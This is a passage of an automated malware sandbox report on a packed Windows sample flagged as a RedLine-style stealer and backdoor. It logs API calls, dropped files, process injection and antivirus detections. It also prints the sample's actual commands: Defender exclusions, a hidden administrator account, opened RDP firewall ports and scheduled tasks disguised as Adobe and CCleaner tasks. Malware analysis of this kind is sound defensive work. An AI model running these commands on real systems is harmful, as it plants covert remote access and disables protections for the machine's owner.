protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74321000
process_handle: 0xffffffff
1 0 0
description RegAsm.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 10899365888
root_path: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\background.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\10.9_0\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\icon.png
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafajomdciknnfnhlbmonkdhhcfgcdhn\3844\background.js
file C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs
file C:\Program Files\RDP Wrapper\rdpwrap.dll
file C:\Users\test22\AppData\Roaming\plink.exe
file C:\Users\test22\AppData\Roaming\KGYyvQq\722.vbs
file C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat
file C:\Users\test22\AppData\Roaming\KGYyvQq\195.vbs
file C:\Program Files\RDP Wrapper\RDPWInst.exe
file C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs
file C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Vacillavo.exe.com
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
file C:\Program Files\RDP Wrapper\rdpwrap.bat
file C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll
file C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs
file C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\1164.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" 2>nul
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\335.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\947.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
cmdline powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
cmdline powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\13.vbs" ENWbXBorgA hKztsHIGxo "C:\Users\test22\AppData\Roaming\KGYyvQq\552.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\KfPhiDQW.bat" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline wmic group where sid="S-1-5-32-555" get name /value
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline "C:\Windows\System32\cmd.exe" /c cmd < Orlo.vst
cmdline C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
cmdline C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\test22\AppData\Roaming\KGYyvQq\195.vbs" "C:\Users\test22\AppData\Roaming\KGYyvQq\722.vbs" "VlROR2NsQlZWazlXTWtwWlVXMDVlVm93UlcxVWF6bERXWG94YjFNemNEQmpNR2hLVWpOb2RrcHJlREphV0VaM1pETmpPV1Y2Clp6Qk9WVkpHVW10V1EweFVTWGhQVkZGMENrNUVXVEpTUXpGRFRVVk5kMHhVUmtaUFJVNUZUVlZaZWsxRVRUQlJXREE5" "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll"
cmdline powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
cmdline wmic group where sid="S-1-5-32-544" get name /value
cmdline C:\Windows\system32\cmd.exe /c "C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat ENWbXBorgA hKztsHIGxo"
cmdline powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Program Files\RDP Wrapper\RDPWInst.exe
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Naso.exe.com
file C:\Users\test22\AppData\Roaming\plink.exe
wmi SELECT Name FROM Win32_Group WHERE sid="S-1-5-32-544"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c cmd < Orlo.vst
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: wusa.exe
parameters: /quiet
filepath: wusa.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .rsrc (virtual_address 0x00020000, virtual_size 0x000b5e2c, size_of_data 0x000b6000, entropy 7.684871776112975) entropy 7.68487177611 description A section with a high entropy has been found
entropy 0.877108433735 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Hijack network configuration rule Hijack_Network
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Install itself for autorun at Windows startup rule Persistence
description Escalate priviledges rule Escalate_priviledges
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Escalate priviledges rule Escalate_priviledges
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000384
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2440
process_handle: 0x00000384
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2496
process_handle: 0x00000380
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2496
process_handle: 0x00000380
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1428
process_handle: 0x000002a0
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1428
process_handle: 0x000002a0
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2632
process_handle: 0x0000026c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2632
process_handle: 0x0000026c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 732
process_handle: 0x00000388
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 732
process_handle: 0x00000388
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1516
process_handle: 0x00000374
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1516
process_handle: 0x00000374
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2792
process_handle: 0x00000104
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2792
process_handle: 0x00000104
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2320
process_handle: 0x000002f8
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2320
process_handle: 0x000002f8
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2320
process_handle: 0x00000314
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2320
process_handle: 0x00000314
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3160
process_handle: 0x000000f8
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3160
process_handle: 0x000000f8
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3304
process_handle: 0x000002a4
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3304
process_handle: 0x000002a4
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3452
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3452
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3652
process_handle: 0x00000388
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3652
process_handle: 0x00000388
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3716
process_handle: 0x000002c0
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3716
process_handle: 0x000002c0
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3828
process_handle: 0x00000104
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3828
process_handle: 0x00000104
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3900
process_handle: 0x000002a4
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3900
process_handle: 0x000002a4
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3964
process_handle: 0x000002b0
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3964
process_handle: 0x000002b0
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 4028
process_handle: 0x000002c8
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 4028
process_handle: 0x000002c8
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 4092
process_handle: 0x0000013c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 4092
process_handle: 0x0000013c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2700
process_handle: 0x0000026c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2700
process_handle: 0x0000026c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3092
process_handle: 0x000002a0
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3092
process_handle: 0x000002a0
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3760
process_handle: 0x0000038c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3760
process_handle: 0x0000038c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3916
process_handle: 0x000002fc
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3916
process_handle: 0x000002fc
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3408
process_handle: 0x00000104
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3408
process_handle: 0x00000104
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3668
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3668
process_handle: 0x000002bc
1 0 0
cmdline net localgroup "Remote Desktop Users" ENWbXBorgA /add
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" 2>nul
cmdline net user ENWbXBorgA hKztsHIGxo /add
cmdline C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
cmdline reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ENWbXBorgA /t REG_DWORD /d "00000000" /f
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
cmdline reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
cmdline sc queryex "TermService"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "AdobeGCInvoker-1.0-MicrosoftAccount65"
cmdline wmic group where sid="S-1-5-32-555" get name /value
cmdline fsutil dirty query C:
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
cmdline reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
cmdline reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
cmdline reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
cmdline wusa.exe /quiet
cmdline reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC87"
cmdline schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline net localgroup Administrators ENWbXBorgA /add
cmdline wmic group where sid="S-1-5-32-544" get name /value
cmdline netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
cmdline C:\Windows\system32\cmd.exe /c "C:\Users\test22\AppData\Roaming\KGYyvQq\tbgUJlYNtm.bat ENWbXBorgA hKztsHIGxo"
cmdline "C:\Windows\System32\wusa.exe" /quiet
cmdline net accounts /maxpwage:unlimited
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
cmdline C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\test22\AppData\Roaming\KGYyvQq\Wwc.dll" /tn "CCleanerSkipUAC19"
cmdline reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
cmdline ping 127.0.0.1 -n 30
cmdline C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
buffer Buffer with sha1: b0bd3cbdf9d37a00eb1a09466ad9f8a9e0a9b9ff
buffer Buffer with sha1: d14f54e5679fad2a8173f5ef47be5afa649dca41
buffer Buffer with sha1: c445eaf6f8fd93746fc3d3374d7b653f13ab5911
cmdline net localgroup Administrators ENWbXBorgA /add
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 413696
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b0000
process_handle: 0x0000016c
1 0 0

NtProtectVirtualMemory

process_identifier: 1376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1966080
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
process_handle: 0x000001f4
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 122880
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001c0000
process_handle: 0x00000204
1 0 0
reg_key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll reg_value %ProgramFiles%\RDP Wrapper\rdpwrap.dll
cmdline netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
cmdline netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: ÿÿÿÿ[ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 2648
process_handle: 0x0000016c
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ`ûÿ(üÿPýÿ€›mèÿÿ jHâýÿ±
base_address: 0xfffde000
process_identifier: 1376
process_handle: 0x000001f4
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿû~(ü~Pý~€›mèÿÿ jHâý~±
base_address: 0x7efde000
process_identifier: 1852
process_handle: 0x00000204
1 1 0
DrWeb BAT.Drop.2756
ESET-NOD32 a variant of Win32/Packed.7zip.CP suspicious
Avast Win32:Malware-gen
Rising Trojan.HiddenRun/SFX!1.D57B (CLASSIC)
Zillya Backdoor.Agent.Win32.79977
Ikarus Trojan-Spy.RedLineStealer
Jiangmin Trojan.Alien.jp
Antiy-AVL Trojan/Generic.ASMalwS.332AC76
Gridinsoft Trojan.Win32.Agent.oa!s1
Microsoft Program:Win32/Wacapew.C!ml
Fortinet W32/Agent.ACXU!tr
AVG Win32:Malware-gen
Process injection Process 2312 called NtSetContextThread to modify thread in remote process 2648
Process injection Process 2912 called NtSetContextThread to modify thread in remote process 1376
Process injection Process 1424 called NtSetContextThread to modify thread in remote process 1852
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2007957956
registers.esp: 5963740
registers.edi: 0
registers.eax: 6114119
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000170
process_identifier: 2648
1 0 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 6290364
registers.edi: 0
registers.eax: 6455306
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000016c
process_identifier: 1376
1 0 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 1703656
registers.edi: 0
registers.eax: 1932866
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 1852
1 0 0
Process injection Process 1944 resumed a thread in remote process 2420
Process injection Process 1944 resumed a thread in remote process 456
Process injection Process 1944 resumed a thread in remote process 2948
Process injection Process 2648 resumed a thread in remote process 2440
Process injection Process 2648 resumed a thread in remote process 2496
Process injection Process 2648 resumed a thread in remote process 1428
Process injection Process 2648 resumed a thread in remote process 2632
Process injection Process 2648 resumed a thread in remote process 732
Process injection Process 2648 resumed a thread in remote process 1516
Process injection Process 2648 resumed a thread in remote process 2792
Process injection Process 2648 resumed a thread in remote process 2320
Process injection Process 2648 resumed a thread in remote process 3160
Process injection Process 2648 resumed a thread in remote process 3304
Process injection Process 2648 resumed a thread in remote process 3452
Process injection Process 2648 resumed a thread in remote process 3652
Process injection Process 2648 resumed a thread in remote process 3716
Process injection Process 2648 resumed a thread in remote process 3828
Process injection Process 2648 resumed a thread in remote process 3900
Process injection Process 2648 resumed a thread in remote process 3964
Process injection Process 2648 resumed a thread in remote process 4028
Process injection Process 2648 resumed a thread in remote process 4092
Process injection Process 2648 resumed a thread in remote process 2700
Process injection Process 2648 resumed a thread in remote process 3092
Process injection Process 2648 resumed a thread in remote process 3760
Process injection Process 2648 resumed a thread in remote process 3916
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2420
1 0 0

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 456
1 0 0

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2948
1 0 0

NtResumeThread

thread_handle: 0x00000380
suspend_count: 1
process_identifier: 2440
1 0 0

NtResumeThread

thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 2496
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 1428
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x00000380
suspend_count: 1
process_identifier: 732
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 1516
1 0 0

NtResumeThread

thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2792
1 0 0

NtResumeThread

thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 2320
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2320
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 3160
1 0 0

NtResumeThread

thread_handle: 0x00000388
suspend_count: 1
process_identifier: 3304
1 0 0

NtResumeThread

thread_handle: 0x000002c0
suspend_count: 1
process_identifier: 3452
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 3652
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 3716
1 0 0

NtResumeThread

thread_handle: 0x000002b0
suspend_count: 1
process_identifier: 3828
1 0 0

NtResumeThread

thread_handle: 0x000002c8
suspend_count: 1
process_identifier: 3900
1 0 0

NtResumeThread

thread_handle: 0x0000013c
suspend_count: 1
process_identifier: 3964
1 0 0

NtResumeThread

thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 4028
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 4092
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2700
1 0 0

NtResumeThread

thread_handle: 0x00000274
suspend_count: 1
process_identifier: 3092
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 3760
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000110
suspend_count: 1
process_identifier: 1764
1 0 0

CreateProcessInternalW

thread_identifier: 2480
thread_handle: 0x0000031c
process_identifier: 2024
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c cmd < Orlo.vst
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634176 (CREATE_DEFAULT_ERROR_MODE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000324
1 1 0

CreateProcessInternalW

thread_identifier: 2236
thread_handle: 0x00000088
process_identifier: 1944
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: cmd
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 3068
thread_handle: 0x0000008c
process_identifier: 1744
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 656
thread_handle: 0x00000090
process_identifier: 2420
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
track: 1
command_line: Pensai.exe.com T
filepath_r: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Pensai.exe.com
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

thread_handle: 0x00000090
suspend_count: 0
process_identifier: 2420
1 0 0

CreateProcessInternalW

thread_identifier: 2176
thread_handle: 0x00000094
process_identifier: 2156
current_directory: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
filepath: C:\Windows\System32\findstr.exe
track: 1
command_line: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst
filepath_r: C:\Windows\system32\findstr.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
